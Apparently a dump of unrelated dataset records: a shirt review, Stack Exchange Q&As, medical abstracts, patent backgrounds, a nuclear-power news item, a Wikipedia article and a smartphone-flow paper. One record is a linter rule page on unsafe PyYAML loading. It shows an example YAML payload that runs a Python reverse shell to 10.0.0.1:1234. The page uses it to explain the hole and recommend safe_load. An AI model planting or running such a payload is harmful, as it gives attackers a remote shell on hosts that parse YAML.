This is a very nice shirt. I bought it on sale for my son who is 6'7". Unfortunately I did return it because my son is slim and the body of the shirt is too wide.
Fit:
very large
Look:
Quality:
Value:
Bottom LineNo, I would not recommend this to a friend
Merchant response: Thank you for your review of the Men's Wapato Long-Sleeve Henley Shirt. We are sorry to hear that the shirt did not fit as expected. We apologize for the disappointment. We are glad that you were able to take advantage of the 100% Satisfaction Guarantee by returning the shirt.
ADVENTURE IN YOUR INBOX
Live Your Adventure. Get Rewarded.
FOLLOW EDDIE BAUER
EDDIE BAUER PRODUCTS ARE GUARANTEED FOR LIFE
As an outdoor guide, Eddie Bauer built products to stand up to the rigors of his adventures. He built them—and guaranteed them— to last. We carry on that legacy. Every product carries a lifetime warranty. If you're ever unhappy with it for any reason, return it for an exchange or refund and we'll help you find what you need to Live Your Adventure.
|
{
"pile_set_name": "Pile-CC"
}
|
# YML100
Use of unsafe yaml load. Allows instantiation of arbitrary objects. Consider yaml.safe_load().
The Pyyaml library's default loader will read any YAML attributes starting with `!!` as special syntax, including the `!!python/object/apply` command, which can execute any method in the standard library.
Because the standard library includes functions to starting local processes, using `yaml.load` against this input would execute local commands on the host shell.
## Deprecation in pyyaml 5.1
Wait, didn't pyyaml deprecate the unsafe loader?
Not really- newer versions of pyyaml (5.1) will raise a __warning__, however many situations like web servers developers would not see this warning.
## Example
```python
import yaml
with open('cfg.yaml') as cfg:
config = yaml.load(cfg)
```
Any attackers payload could look something like this:
```yaml
!!python/object/apply:exec ['import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);']
```
When deserialized, this would start a shell on TCP 10.0.0.1:1234.
## Quick Fixes
* Plugin will recommend [Safe Load Fixer](../fixes/safeloadfixer.md).
## See Also
* [YAML Load Input Documentation](https://github.com/yaml/pyyaml/wiki/PyYAML-yaml.load(input)-Deprecation)
|
{
"pile_set_name": "Github"
}
|
School-based prevention of anxiety using the "My FRIENDS" emotional resilience program: Six-month follow-up.
Anxiety-related problems are common in childhood and adolescence and, if left untreated, may hold short-term and long-term negative consequences for psychosocial functioning and other domains. In addition to having negative individual-level consequences, anxiety-related problems may have a negative impact at the school level. Because almost all children and adolescents attend school, school plays a significant role in development as a socialisation agent and provides an ideal venue for the delivery of prevention and intervention programs. Here, we present the first evidence regarding the effectiveness of the My FRIENDS emotional resilience program as a method of reducing anxiety among students in Slovenia and the feasibility of implementing the program at the national level. Grade 8 students (N = 78) were assigned either the intervention condition, the My FRIENDS program, or a no-treatment control condition. We measured general anxiety and its components using the AN-UD (Lestvica anksioznosti za učence in dijake) anxiety scale and internalising difficulties using the Strengths and Difficulties Questionnaire at preintervention, postintervention, and 6-month follow-up assessments. Students in the intervention condition reported lower amounts of general anxiety and its cognitive component of worrying, and fewer internalising difficulties at the postintervention and follow-up assessments.
|
{
"pile_set_name": "PubMed Abstracts"
}
|
Q:
Can't format SD Card after OS X Lion update to 10.7.4
Today I tried to format my SD cards with no success. The only thing different that I did was updating to 10.7.4 this weekend. What can I do to re-enable this function?
The can't format part means I can't format to any filesystem. It shows "read only". The erase format is not enabled.
Another user here has confirmed the same problem. The SD cards in question format fine in a camera but I can't write to it when I plug it into MacBook Pro. This started to happen only after update to 10.7.4. The problems seems to stem from (or correlate with) Disk Utility greying out all options apart from 'verify disk'.
Inserting SD card to SD -> USB dongle works just fine, so it's only SD card slot which seems to have assigned 'read only' status.
It's weird it started to work fine for a while and again I can't write to or format the SD cards.
I've formated a SD card with both exFAT and FAT32 and tried to use it on my laptop with Linux and guess what happened? It was read only even in another computer, but I've formated it again using Linux utility and everything is fine.
But the SD saga continues on OS X Lion, as well as Mountain Lion and Mavericks.
It is annoying buying an Apple product and have this kind of headache, and the worst is that I don't have the possibility of walking in an Apple Store and ask a genius to solve it for me.
A:
There are two likely possible causes for this:
It's a hardware fault that just showed up, or
It's a bug in OS X 10.7.4.
The best fix for both of these (currently) is to visit your local Apple Store's Genius Bar. In case 1, they'll fix your SD reader. In case 2, they'll pass the bug in OS X up the food chain so it can get fixed in 10.7.5 (they'll probably try to fix the hardware, too, just in case).
|
{
"pile_set_name": "StackExchange"
}
|
Q:
What does :convertprc means in terms of process
I an trying to write a bound service in android using Messenger. I am able to successfully do that by following online examples. The way every one defines the service is as following:
<service android:name = ".ConvertService" android:process=":convertprc"/>
I am unable to find documentation on what :convertprc means as an attribute for process.
A:
From the documentation on Service Element for the Android Manifest:
https://developer.android.com/guide/topics/manifest/service-element.html
In the section labelled android:process
If the name assigned to this attribute begins with a colon (':'), a new process, private to the application, is created when it's needed and the service runs in that process.
|
{
"pile_set_name": "StackExchange"
}
|
The Moorside site, near Sellafield, above, is part of the government’s strategy to build new nuclear plants to fill the energy gap.
Photograph: Owen Humphreys/PA
Plans for a new nuclear power station in Cumbria are likely to be scrapped after a key backer pulled out, creating a major hole in the government’s nuclear strategy.
Two industry sources close to the process said Toshiba had privately decided to quit the consortium behind the planned Moorside plant, echoing sources who told Reuters and the Wall Street Journal that the Japanese company was withdrawing from new nuclear projects in the UK.
Toshiba said last month it was reviewing all its nuclear business abroad after suffering a multibillion-dollar writedown on its US business. It has promised to provide more details about its intentions when it publishes results on 14 February.
The French energy firm Engie, which is Toshiba’s partner in the NuGen consortium, has long been seen as wanting to get out of the project. Its chief executive said last year the future did not lie in nuclear power.
The company said that, along with Toshiba, it was seeking new investors to finance the Moorside plant, which are reported to include Korea Electric Power Corporation (Kepco).
Senior figures in the industry urged the government to start discussions with the South Koreans immediately to safeguard the power station if Toshiba left NuGen.
“Any potential investor in that project is going to need to have very direct reassurance from the government; even if they are just starting an exploratory period, they are welcomed,” said Tim Yeo, the chairman of the pro-nuclear group New Nuclear Watch Europe.
Unions also called for the government to step in with funding to save the plant if Toshiba pulled out. “It looks increasingly like bad business investments may have busted Toshiba’s role in a new nuclear facility at Moorside in Cumbria,” said Justin Bowden, the GMB’s national secretary for energy.
Moorside, near Sellafield, is a key part of the government’s hopes for a new fleet of power stations to fill the UK’s energy gap in the next decade as coal plants and ageing atomic plants close.
The only one to be approved so far is EDF’s £18bn Hinkley Point C plant in Somerset, which was made financially possible through subsidies to be levied on household bills. The government hopes new plants will be built at Wylffa, Sizewell, Bradwell and Oldbury.
Of Moorside’s three mooted reactors, Paul Dorfman, from the Energy Institute at University College London said: “These are really big pieces of kit. If and when plans for Moorside fail, this leaves an existential gap in UK energy policy.”
|
{
"pile_set_name": "Pile-CC"
}
|
Multiple sebaceous adenomas and internal malignant disease: a case report with chromosomal analysis.
A case of multiple sebaceous adenomas associated with internal malignant disease is further documented. Thirteen similar cases reported in the literature are also reviewed. We support the thesis that this association represents a unique syndrome. It can be seen in both sexes and usually is manifested during the fifth and sixth decades. A family history of malignant disease was revealed among seven of the nine cases mentioned. Of the other skin lesions, keratoacanthoma is also frequently seen. The internal malignant tumors most commonly afflict the gastrointestinal tract, especially the large intestine. With proper treatment the internal tumors appear to be of a low degree of malignancy. However, these patients have a propensity to develop muliple visceral tumors and require periodic follow-up. Some patients develop skin tumors prior to the discovery of internal malignant disease, an event that offers some prognostic value. Chromosomal study of the cultured blood lymphocytes by the Giemsa banding technique failed to reveal any abnormality.
|
{
"pile_set_name": "PubMed Abstracts"
}
|
Respiratory syncytial virus (RSV) is the leading cause of serious lower respiratory tract disease in infants and children (Feigen et al., eds., 1987, In: Textbook of Pediatric Infectious Diseases, W B Saunders, Philadelphia at pages 1653-1675; New Vaccine Development, Establishing Priorities, Vol. 1, 1985, National Academy Press, Washington D.C. at pages 397-409; and Ruuskanen et al., 1993, Curr. Probl. Pediatr. 23:50-79). The yearly epidemic nature of RSV infection is evident worldwide, but the incidence and severity of RSV disease in a given season vary by region (Hall, C. B, 1993, Contemp. Pediatr. 10:92-110). In temperate regions of the northern hemisphere, it usually begins in late fall and ends in late spring (Halt C. B., 1995, In: Mandell G. L, Bennett J. E., Dolin R., eds., 1995, Principles and Practice of infections Diseases. 4th ed &, Churchill Livingstone, New York at pages 1501-1519). It is estimated that RSV illness results in 90,000 hospitalizations and causes 4,500 deaths annually in the United States. Primary RSV infection occurs most often in children from 6 weeks to 2 years of age and uncommonly in the first 4 weeks of life during nosocomial epidemics (Hall et al., 1979, New Engl. J. Med. 300:393-396). RSV is estimated to cause as much as 75% of all childhood bronchiolitis and up to 40% of all pediatric pneumonias (Cunningham, C. K. et al., 1991, Pediatrics 88:527-532). Children at increased risk from RSV infection include preterm infants (Hall et al., 1979, New Engl. J. Med. 300:393-396) and children with bronchopulmonary dysplasia (Groothuis et al., 1988, Pediatrics 82:199-203), congenital heart disease MacDonald et al., New Engl. J. Med. 307:397-400), congenital or acquired immunodeficiency (Ogra et al., 1988, Pediatr. Infect. Dis. J. 7:246-249; and Pohl et al., 1992, J. Infect. Dis. 165:166-169), and cystic fibrosis (Abman et al., 1988, J. Pediatr. 113:826-830). The fatality rate in infants with heart or lung disease who are hospitalized with RSV infection is 3%-4% (Navas et al., 1992, J. Pediatr. 121:348-354).
RSV infects adults as well as infants and children. In healthy adults, RSV causes predominantly upper respiratory tract disease. It has recently become evident that some adults, especially the elderly, have symptomatic RSV infections more frequently than had been previously reported (Evans, A. S., eds., 1989, Viral Infections of Humans. Epidemiology and Control, 3rd ed., Plenum Medical Book, New York at pages 525-544). Several epidemics also have been reported among nursing home patients and institutionalized young adults (Falsey, A. R., 1991, Infect. Control Hosp. Epidemiol. 12:602-608; and Garvin et al., 1980, Br. Med. J. 281:1253-1254). Finally, RSV may cause serious disease in immunosuppressed persons, particularly bone marrow transplant patients (Hertz et al., 1989, Medicine 68:269-281).
Treatment options for established RSV disease are limited. Severe RSV disease of the lower respiratory tract often requires considerable supportive care, including administration of humidified oxygen and respiratory assistance Fields et al., eds, 1990, Fields Virology, 2nd ed., Vol. 1, Raven Press, New York at pages 1045-1072). The only drug approved for treatment of infection is the antiviral agent ribavirin (American Academy of Pediatrics Committee on Infectious Diseases, 1993, Pediatrics 92:501-504). It has been shown to be effective in the treatment of RSV pneumonia and bronchiolitis, modifying the course of severe RSV disease in immunocompetent children (Smith et al., 1991, New Engl. J. Med. 325:24-29). However, ribavirin has a number of limitations including high cost need for prolonged aerosol administration and potential risk to pregnant women as well as to exposed health care personnel. The American Academy of Pediatrics Committee on Infectious Diseases revised their recommendation for use of ribavirin. The current recommendation is that the decision to use ribavirin should be based on the particular clinical circumstances and physician's experience (American Academy of Pediatrics. Summaries of infectious Diseases. In: Pickering L. K, ed., 2000 Red Book: Report of the Committee on Infectious Diseases. 25th ed., Elk Grove Village, Ill., American Academy of Pediatrics, 2000, pp. 483-487).
While a vaccine might prevent RSV infection, no vaccine is yet licensed for this indication. A major obstacle to vaccine development is safety. A formalin-inactivated vaccine, though immunogenic, unexpectedly caused a higher and more severe incidence of lower respiratory tract disease due to RSV in immunized infants than in infants immunized with a similarly prepared trivalent parainfluenza vaccine (Kim et al., 1969, Am. J. Epidemiol. 89:422-434; and Kapikian et al., 1969, Am. J. Epidemiol. 89:405-421). Several candidate RSV vaccines have been abandoned and others are under development (Murphy et al., 1994, Virus Res. 32:13-36), but even if safety issues are resolved, vaccine efficacy must also be improved. A number of problems remain to be solved. Immunization would be required in the immediate neonatal period since the peak incidence of lower respiratory tract disease occurs at 2-5 months of age. The immaturity of the neonatal immune response together with high titers of maternally acquired RSV antibody may be expected to reduce vaccine immunogenicity in the neonatal period (Murphy et al., 1988, J. Virol. 62:3907-3910; and Murphy et al., 1991, Vaccine 9:185-189). Finally, primary RSV infection and disease do not protect well against subsequent RSV disease Henderson et al., 1979, New Engl. J. Med. 300:530-534).
Currently, the only approved approach to prophylaxis of RSV disease is passive immunization. Initial evidence suggesting a protective role for IgG was obtained from observations involving maternal antibody in ferrets (Prince, G. A, Ph.D. diss., University of California, Los Angeles, 1975) and humans (Lambrecht et al, 1976, J. Infect Dis. 134:211-217; and Glezen et al., 1981, J. Pediatr. 98:708-715). Hemming et al. (Morell et al., eds., 1986, Clinical Use of Intravenous Immunoglobulins, Academic Press, London at pages 285-294) recognized the possible utility of RSV antibody in the treatment or prevention of RSV infection during studies involving the pharmacokinetics of an intravenous immune globulin (IVIG) in newborns suspected of having neonatal sepsis. They noted that one infant, whose respiratory secretions yielded RSV, recovered rapidly after IVIG infusion. Subsequent analysis of the IVIG lot revealed an unusually high titer of RSV neutralizing antibody. This same group of investigators then examined the ability of hyperimmune serum or immune globulin, enriched for RSV neutralizing antibody, to protect cotton rats and prima against RSV infection (Prince et al., 1985, Virus Res. 3:193-206; Prince et al., 1990, J. Virol. 64:3091-3092; Hemming et al., 1985, J. Infect. Dis. 152:1083-1087; Prince et al., 1983, Infect. Immun. 42:81-87; and Prince et al., 1985, J. Virol. 55:517-520). Results of these studies suggested that RSV neutralizing antibody given prophylactically inhibited respiratory tract replication of RSV in cotton rats. When given therapeutically. RSV antibody reduced pulmonary viral replication both in cotton rats and in a nonhuman primate model. Furthermore, passive infusion of immune serum or immune globulin did not produce enhanced pulmonary pathology in cotton rats subsequently challenged with RSV.
A humanized antibody directed to an epitope in the A antigenic site of the F protein of RSV, SYNAGIS®, comprising variable heavy (VH) complementarity determining regions (CDRs) having the amino acid sequences of SEQ ID NO:1-3 and variable light (VL) CDRs having the amino acid sequences of SEQ ID NO:4-6, is approved for intramuscular administration to pediatric patients for prevention of serious lower respiratory tract disease caused by RSV at recommended monthly doses of 15 mg/kg of body weight throughout the RSV season (November through April in the northern hemisphere). SYNAGIS® is a composite of human (95%) and murine (5%) antibody sequences. See, Johnson et al., 1997, J. Infect Diseases 176:1215-1224 and U.S. Pat. No. 5,824,307, the entire contents of which are incorporated herein by reference. The human heavy chain sequence was derived from the constant domains of human IgG1 and the variable framework regions of the VH genes of Cor (Press et al., 1970, Biochem. J. 117:641-660) and Cess (Takahi et al., 1984, Proc. Natl. Acad. Sci. USA 81:194-198). The human light chain sequence was derived from the constant domain of C6 and the variable framework regions of the VL gene K104 with J6-4 (Bentley et al., 1980, Nature 288:5194-5198). The murine sequences were derived from a murine monoclonal antibody, Mab 1129 (Beeler et al., 1989, J. Virology 63:2941-2950), in a process which involved the grafting of the murine complementarity determining regions into the human antibody frameworks.
SYNAGIS® has high specific activity against RSV in vitro (approximately 50-100 times that of RESPIGAM® (respiratory syncytial virus immune globulin, human) and is known to neutralize a broad range of RSV isolates. Since it is not derived from human plasma, prophylactic treatment with SYNAGIS® does not carry potential risk of transmission of blood borne pathogens.
SYNAGIS® was initially formulated as a liquid for IV use, at a concentration of 10 mg/ml SYNAGIS® in phosphate buffered saline. A lyophilized formulation of SYNAGIS®, which allows a higher concentration (100 mg/ml after reconstitution, in 50 mM histidine and 3.2 mM glycine buffer with 6% (w/v) mannitol at pH 6.0) of the antibody than this initial liquid formulation, was produced later to allow intramuscular use. The lyophilized formulation of SYNAGIS® is prepared by lyophilizing SYNAGIS® at 54 mg/ml in an aqueous solution containing 25 mM histidine, 1.6 mM glycine, and 3% (w/v) mannitol at pH 6.0. The initial liquid formulation in PBS and the lyophilized formulation of SYNAGIS® have been tested in phase I clinical studies in healthy adults. The lyophilized formulation was tested in phase I through phase IV studies in pediatric patients. SYNAGIS®, at doses of 15 mg/kg to 30 mg/kg for adults is found to be well tolerated, and 15 mg/kg for children is found to be safe and efficacious for RSV prophylaxis. The lyophilized formulation was approved in 1998 by the FDA for use in the prevention of serious lower respiratory tract disease caused by RSV in children at high risk of RSV disease.
However, the lyophilized formulation has a number of limitations, including a prolonged process for lyophilization and resulting high cost for manufacturing. In addition, the lyophilized formulation has to be reconstituted aseptically and accurately by healthcare practitioners prior to administering to patients. The reconstitution step itself requires certain specific procedures: (1) a sterile diluent (i.e., water or 5% dextrose in water for intravenous administration and water for intramuscular administration) is added to the vial containing lyophilized SYNAGIS®, slowly and aseptically, and the vial must be swirled very gently for 30 seconds to avoid foaming (2) the reconstituted SYNAGIS® needs to stand at room temperature for a minimum of 20 minutes until the solution clarifies; and (3) the reconstituted preparation must be administered within six (6) hours after the reconstitution. Such reconstitution procedure is cumbersome and the time limitation after the reconstitution can cause a great inconvenience in administering the formulation to patients, leading to significant waste, if not reconstituted properly or if the reconstituted dose is not used within six (6) hour and must be discarded.
Thus, a need exists for a liquid formulation of SYNAGIS® at a concentration comparable to or higher than the reconstituted lyophilized formulation so that there is no need to reconstitute the formulation prior to administration. This allows health care practitioners much quicker and easier administration of SYNAGIS® to a patient.
Prior liquid antibody preparations have short shelf lives and may lose biological activity of the antibodies resulting from chemical and physical instabilities during the storage. Chemical instability may be caused by deamidation, racemization, hydrolysis, oxidation, beta elimination or disulfide exchange, and physical instability may be caused by antibody denaturation, aggregation, precipitation or adsorption. Among those, aggregation, deamidation and oxidation are known to be the most common causes of the antibody degradation (Wang et al., 1988, J. of Parenteral Science & Technology 42(Suppl):S4-S26; Cleland et al., 1993, Critical Reviews in Therapeutic Drug Carrier Systems 10(4):307-377). Thus, there is a need for a stable liquid formulation of SYNAGIS® or an antigen-binding fragment thereof effective to prevent RSV infection.
|
{
"pile_set_name": "USPTO Backgrounds"
}
|
Dr. Henry Skelton House
Dr. Henry Skelton House is a historic house at 889 South Main Street in Southington, Connecticut. Built about 1748, it is a well-preserved example of colonial Georgian architecture. It was listed on the National Register of Historic Places in 1989.
Description and history
The Dr. Henry Skelton House is located south of the village center of Southington, at the northeast corner of South Main Street and Buckland Street. It is a 2-1/2 story wood frame structure, with a side gable roof, central brick chimney, and clapboarded exterior. Its main facade is five bays wide, with windows placed with slight asymmetry around a center entrance. The entrance has a period board door with strap hinges; it and the first floor windows (which are unusually tall for the period) are topped by a wooden stringcourse that serves as a lintel. A leanto section (apparently integral to the main body construction) extends to the rear, giving the house a saltbox profile. The side gable peak sections are finished in decorative Queen Anne style cut wooden shingles.
The house was built about 1748 for Southington's second doctor, Henry Skelton, who was born in England in 1688. The tall windows on the first floor are probably a later Greek Revival modification, and the building at one time sported a full-width Italianate porch.
See also
National Register of Historic Places listings in Southington, Connecticut
References
Category:Houses on the National Register of Historic Places in Connecticut
Category:American colonial architecture
Category:Houses completed in 1748
Category:Houses in Southington, Connecticut
Category:National Register of Historic Places in Hartford County, Connecticut
Category:1748 establishments in Connecticut
|
{
"pile_set_name": "Wikipedia (en)"
}
|
1. Technical Field
The present disclosure generally relates to an information handling system and in particular to power management for cooling systems within an information handling system.
2. Description of the Related Art
As the value and use of information continue to increase, individuals and businesses seek additional ways to process and store information. One option available to users is information handling systems. An information handling system generally processes, compiles, stores, and/or communicates information or data for business, personal, or other purposes, thereby allowing users to take advantage of the value of the information. Because technology and information handling needs and requirements vary between different users or applications, information handling systems may also vary regarding what information is handled, how the information is handled, how much information is processed, stored, or communicated, and how quickly and efficiently the information may be processed, stored, or communicated. The variations in information handling systems allow for information handling systems to be general or configured for a specific user or specific use such as financial transaction processing, airline reservations, enterprise data storage, or global communications. In addition, information handling systems may include a variety of hardware and software components that may be configured to process, store, and communicate information and may include one or more computer systems, data storage systems, and networking systems.
New generations of information handling systems have required increases in power capabilities over prior generations. Seemingly without exception, new designs have increased components such as central processing units (CPU), hard disk drives (HDD), memory, various adapters and controllers, all of which generate heat. As each generation has an increased thermal load, effective management of cooling systems is of increasing importance.
The “thermal design power (TDP)” for a given component represents a maximum amount of heat a cooling system is required to dissipate. That is, if a cooling system is capable of dissipating the TDP rated heat for a given component, the component will operate as intended. In short, the TDP is the power budget under which the various components must operate. However, the TDP is not the maximum power a component can consume. For example, it is possible for a processor to consume more than the TDP power for a short period of time without it being “thermally significant.” Using basic physics, heat will take some time to propagate, so a short burst may not jeopardize the goal of staying within the TDP.
Various techniques have been employed to manage thermal control in view of system performance. Exemplary techniques have included use of oversized cooling systems, controlling processor speed as a function of temperature, and implementing power capping (i.e., limiting the power to heat generating components). Unfortunately, the various techniques for thermal control can impact system performance. In some instances, the impact is merely nominal. However, this is not always the case.
Unfortunately, power within an information handling system is not limitless and use of system power is not without thermal and performance consequence. Clearly, as a motorized component, the fan can consume a substantial amount of power. In systems that increasingly demand power for computing resources, having power dedicated to the cooling system can substantially impact performance.
That is, while thermal control techniques may limit power to multiple subsystems, such techniques do not account for limiting power to a system fan for controlling power consumption by the fan. Accordingly, design of information handling systems must take into account balance of system performance with thermal control.
What is needed is a solution to provide dynamic run-time bi-directional communication that serves the needs of both power control and thermal control where priority there between may fluctuate.
|
{
"pile_set_name": "USPTO Backgrounds"
}
|
Q:
Java Constructor Chaining
Hi I am just learning about constructor chaining in Java and had some questions...
First of all could someone please explain when I would ever need to use this? Off the top of my head I seriously cannot think of a situation.
In this example, within the constructor with no arguments I call another constructor. How do I access this new "James Bond" object for future use?
import java.util.*;
class Employee
{
private String name;
private double salary;
public Employee()
{
this("James Bond", 34000);
}
public Employee(String n, double s)
{
name = n;
salary = s;
}
public String getName()
{
return name;
}
public double getSalary()
{
return salary;
}
public static void main(String[] args)
{
Employee a = new Employee();
}
}
A:
Actually I believe the most common use of chained Constructors is when the Constructor does more than just setting the member variables.
static int numOfExamples = 0;
public Example(String name, int num)
{
this.name = name;
this.num = num;
numOfExamples++;
System.out.println("Constructor called.");
Log.info("Constructor called");
}
public Example()
{
this("James Bond",3);
}
That way we don't have to write the code for logging and incrementing the static variable twice, instead just chaining the constructors.
|
{
"pile_set_name": "StackExchange"
}
|
Delayed cord clamping in preterm dichorionic twin gestations.
To examine the practice of delayed cord clamping and associated neonatal outcomes in preterm dichorionic twin gestations. This is a retrospective cohort study of women delivering dichorionic-diamniotic twin gestations between 23 and 32 weeks of gestation at a single large academic center between 2013 and 2015. Neonatal outcomes of twins receiving delayed cord clamping were compared to those who did not. Of 58 eligible women delivering dichorionic twins, eight (13.8%) had both neonates receive delayed cord clamping, resulting in 16 neonates who received delayed cord clamping and 100 who did not. Neonates who received delayed cord clamping had no difference in umbilical artery pH, 5 min Apgar score, NICU length of stay, need for pressors, neonatal death, or other adverse outcomes. Delayed cord clamping in dichorionic twin gestations born at 32 weeks or less is feasible and in this small cohort does not appear to be associated with worse neonatal outcomes.
|
{
"pile_set_name": "PubMed Abstracts"
}
|
Q:
React component isn't rendered to index.html
I'm really beginner in ReactJS. Component isn't rendering, I've wasted a lot of time to search that but unsuccessful.
I'm following tutorial from this series. I've already configured webpack-dev-server from this link.
Check the file hierarchy below, according to the tutorial.
Kindly let me know the problem.
index.html
<!DOCTYPE html>
<html>
<head>
<title>React</title>
</head>
<body>
<div id="app"></div>
<script src="app.js"></script>
</body>
</html>
App.js
import React from 'react';
class AppFirst extends React.Component{
render(){
return(
<div>
<h1>Hello ReactJs</h1>
</div>
);
}
}
var appElement = <AppFirst />;
Raect.render(appElement, document.getElementById("app"));
package.json
{
"name": "react-for-everyone",
"version": "1.0.0",
"description": "",
"main": "app.js",
"scripts": {
"test": "echo \"Error: no test specified\" && exit 1",
"dev": "./node_modules/.bin/webpack-dev-server --content-base"
},
"author": "",
"license": "ISC",
"devDependencies":{
"babel-core": "^6.1.*",
"babel-loader": "^6.2.*",
"babel-preset-es2015": "^6.16.*",
"babel-preset-react": "^6.16.*",
"webpack": "^1.13.*",
"webpack-dev-server": "^1.16.*"
},
"dependencies":{
"react": "^15.3.*",
"react-dom": "^15.3.*"
}
}
webpack-config.js
module.exports ={
entry: [
'webpack-dev-server/client?http://localhost:8080',
'webpack/hot/only-dev-server',
'./src/App.js'
],
output: {
path: path.resolve(__dirname, "react-for-everyone"),
filename: 'app.js',
publicPath: 'http://localhost:8080'
},
devServer: {
contentBase: "./react-for-everyone",
},
module:{
loaders:[{
test: "/\.jsx?$/",
exclude: /node_modules/,
loader: "babel",
query: {
preset: ['es2015', 'react']
}
}]
}
};
A:
React.render() is no longer used with the current versions. React has split the library from 0.14 version. You need to use ReactDOM.render() apart from the typo that you have in React.render()
import React from 'react';
import ReactDOM from 'react-dom';
class AppFirst extends React.Component{
render(){
return(
<div>
<h1>Hello ReactJs</h1>
</div>
);
}
}
var appElement = <AppFirst />;
ReactDOM.render(appElement, document.getElementById("app"));
<script src="https://cdnjs.cloudflare.com/ajax/libs/react/0.14.8/react.min.js"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/react/0.14.8/react-dom.min.js"></script>
<div id="app"></div>
In your webpack you have put quotes in test: "/\.jsx?$/" you shouldn't have them. test: /\.jsx?$/. It should be a regex and not a string
Other corrections you need to do.
Rename your webpack-config.js to webpack.config.js
In webpack loaders you need to define presets and not preset
Include path in your package.json with npm install -S path and webapck as var path = require('path');
Change your directory structure with index.html included in src
You final webpack looks like this
webpack.config.js
var path = require('path');
module.exports ={
context: path.join(__dirname, "src"),
entry: [
'./App.js'
],
output: {
path: __dirname + "/src",
filename: 'bundle.js',
},
module:{
loaders:[{
test: /\.jsx?$/,
exclude: /node_modules/,
loader: "babel-loader",
query: {
presets: ['es2015', 'react']
}
}]
}
};
Change your script in package.json to "dev": "./node_modules/.bin/webpack-dev-server --content-base src"
Finally after doing npm run dev open http://localhost:8080/index.html
|
{
"pile_set_name": "StackExchange"
}
|
Q:
What is wrong with my regular expression in R?
I am trying to extract the label, name, address, city, zip, and distance from the following text:
A
Carl's Jr.
308 WESTWOOD PLAZA
LOS ANGELES, CA 90095-8355
0.0 mi.
B
Carl's Jr.
2727 SANTA MONICA
SANTA MONICA, CA 90404-2407
4.8 mi.
...
...
Here is my regular expression pattern and code, but I get a matrix of NA values.
p <- "(^[AZ]\\n)^(\\w+.\\w+\\s\\w+.\\s*\\w*)\\n^(\\d+\\w+\\s*\\w*\\s*\\w*)\\n^(\\w+\\s*\\w*),\\s(CA)\\s(\\d+-*\\d*)\\n^(\\d+.\\d*)\\smi."
matches <- str_match(cj, p)
Do I have a syntax error in my pattern?
A:
Maybe try strsplit() instead. See regex101 for an explanation of the regex used below. Afterwards, we can figure out how many rows there will be by finding the number of single character elements.
s <- strsplit(x, "\n+|, | (?=[0-9]+)", perl = TRUE)[[1]]
as.data.frame(matrix(s, sum(nchar(s) == 1), byrow = TRUE))
# V1 V2 V3 V4 V5 V6 V7
# 1 A Carl's Jr. 308 WESTWOOD PLAZA LOS ANGELES CA 90095-8355 0.0 mi.
# 2 B Carl's Jr. 2727 SANTA MONICA SANTA MONICA CA 90404-2407 4.8 mi.
Data:
x <- "A\n\nCarl's Jr.\n\n308 WESTWOOD PLAZA\n\nLOS ANGELES, CA 90095-8355\n\n0.0 mi.\n\nB\n\nCarl's Jr.\n\n2727 SANTA MONICA\n\nSANTA MONICA, CA 90404-2407\n\n4.8 mi."
|
{
"pile_set_name": "StackExchange"
}
|
Introduction {#s0005}
============
Ten years since its inception, the smartphone is now ubiquitous in everyday life, with approximately two billion users worldwide ([@bb0090]). Given the diverse range of functions afforded by this pocket-sized gadget -- from communication to navigation and entertainment -- the popularity of the smartphone seems inevitable. Yet, while 24--7 access to a powerful computer may make certain aspects of our lives easier, increasing concerns exist about the negative effects of smartphone (over)use. Such problems are diverse in nature and include the more general problem of our "digital footprint", i.e. the recording of users\' interactions on the Internet through cookies. While we acknowledge that such data can be exploited in a meaningful way (e.g. see review by [@bb0105], [@bb0115]), the misuse of data recorded in this manner is legion. This has been highlighted by the international mass media many times. For example, in 2016, Time magazine ran a story on how Facebook handles users\' data.[1](#fn0005){ref-type="fn"}
On an individual level, more problematic in everyday life may be the habit-forming nature of smartphone use ([@bb0125]). Smartphone use has, arguably, the potential to develop into an addictive behaviour, similar to gambling, which can interfere with our everyday life. Though not an official diagnosis, several researchers have demonstrated how classic addiction symptomology may be applicable in the context of smartphone overuse, including loss of control (e.g. distortion of time spent on the phone), preoccupation with the smartphone, withdrawal symptoms and negative effects on our social and work lives (e.g. [@bb0065], [@bb0070], [@bb0080]).
The latter problem area is of interest for the current study, as smartphones can distract us to a point where we are unable to achieve a state of flow at work (see [@bb0120]). Flow describes a state in which we are fully absorbed by an activity, forgetting about space and time, whilst being very productive ([@bb0035]). For example, when in a state of flow, you may write many pages of a document without awareness of the passage of time. To achieve a state of flow two important pre-requisites must be met. First, there must be an even match between a person\'s ability and the difficulty of a given task. In addition - and this is where smartphone use may play a role -- achievement of flow requires several minutes of full, unbroken, concentration ([@bb0030], [@bb0005]). To remain in this state, one must maintain this concentration of focused attention on the task at hand. Even brief interruptions may undermine an individual\'s achievement of the flow state. [@bb0005] found that interruptions as brief as 2.8 s disrupted participants\' flow of concentration and led to increased errors on a sequence-based cognitive task. Thus, smartphones with their visual and acoustic signals alerting the owner to incoming messages from social networks, etc. act as interrupters ([@bb0135]), which have the potential to hinder flow experience and may have an associated negative impact on productivity. Furthermore, the intermittent reinforcement received from smartphones may facilitate the development of a "checking habit", i.e. brief repeated inspections of the phone to scan for new content ([@bb0125]; for a more developed explanation of how conditioning principles may operate to influence unconscious smartphone use, see [@bb0045]). The degree to which this checking habit could undermine the achievement of flow has been highlighted by the recent observation that participants check their smartphone every 18 min ([@bb0085])*.* Furthermore, it may also be possible to enter a state of flow whilst using the smartphone, which could, in a work environment, further undermine work-related productivity.
